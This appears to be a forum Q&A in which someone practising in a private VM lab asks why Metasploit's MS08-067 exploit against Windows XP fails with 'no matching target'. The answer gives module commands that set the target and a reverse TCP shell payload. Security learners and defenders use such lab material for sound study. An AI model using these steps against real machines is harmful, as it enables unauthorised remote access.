# What am I getting this Metasploit error: “Exploit aborted due to failure: no-target: No matching target”

Tags: kali-linux, metasploit

Currently running two VMs on a host-only adapter for practice, on one is Kali Linux, and the other is Microsoft Windows XP SP2.

I am attempting to access the Windows XP VM through the common `windows/smb/ms08_067_netapi` exploit, and I keep receiving the error.

> "Exploit aborted due to failure: no-target: No matching target"

Here's what I've done to receive this.

```
service postgresql start
msfconsole
nmap 192.168.56.101 (remember it's in a host-only adapter, not sure if this is why I am experiencing this)
Receive 4 open ports, 445 included.
I set the LHOST as my Attackers IP
I set RHOST to the Attackee
I check if it is vulnerable to the exploit - It confirms
[*] Started reverse TCP handler on 192.168.xx.xxxx:4444  
[*] 192.168.xx.xxxx:445 - Automatically detecting the target...
[*] 192.168.xx.xxxx:445 - Fingerprint: Windows XP - Service Pack 1 - lang:Unknown
[*] 192.168.xx.xxxx:445 - We could not detect the language pack, defaulting to English
[-] 192.168.xx.xxxx:445 - Exploit aborted due to failure: no-target: No matching target
[*] Exploit completed, but no session was created.
```

Is the solution really right in front of my nose? What could it be?

Answer (score 1):

According to the article
[Metasploit Basics for Beginners – Exploiting Windows XP (MS08–067) with Metasploit (Kali Linux) – Part 1](https://www.getastra.com/blog/security-audit/how-to-hack-windows-xp-using-metasploit-kali-linux-ms08067/),
you should also set the following:

```
show targets
set Target (Target Number)
set payload windows/shell_reverse_tcp
exploit
```

See the article for more details.